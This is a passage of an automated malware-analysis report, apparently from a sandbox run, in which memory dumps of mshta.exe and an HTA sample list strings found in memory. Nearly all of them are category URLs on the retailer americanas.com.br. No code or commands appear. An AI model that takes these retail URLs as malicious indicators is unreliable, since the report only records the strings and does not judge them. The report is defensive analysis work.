00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/escritorio/mesas-para-escritorio
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509041649.000000000BE06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/poltrona?chave=pfm_hm_tt_1_0_poltrona
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574416086.000000000960B000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/quarto-completo?chave=pfm_hm_tt_1_0_quarto-completo
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/quarto-e-colchao/guarda-roupa
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sala-de-estar/cadeira?chave=pfm_hm_tt_1_0_cadeira
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sala-de-estar/rack-com-painel
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sala-de-jantar?chave=pfm_hm_tt_1_0_sala-de-jantar
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507926809.000000000BE97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509041649.000000000BE06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sofa?chave=pfm_hm_tt_1_0_sofa
Source: mshta.exe, mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554832793.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508834101.000000000BE2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=dk_hm_at_moveis
Source: mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554832793.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=dk_hm_at_moveis#p
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511077657.000000000BE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577444815.000000000AA47000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541572740.000000000AA47000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509074640.000000000BE8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=pfm_hm_tt_1_0_moveis
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=pfm_home_moveis_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486157607.0000000009DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486575456.0000000009DAC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486376745.0000000009DA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486650176.0000000009DAE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/papelaria?chave=dk_hm_at_papelaria
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/papelaria?chave=pfm_home_papelaria_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577286875.000000000A980000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/pc-gamer?chave=pfm_home_pcgamer_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486157607.0000000009DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486575456.0000000009DAC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486376745.0000000009DA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486650176.0000000009DAE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577286875.000000000A980000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 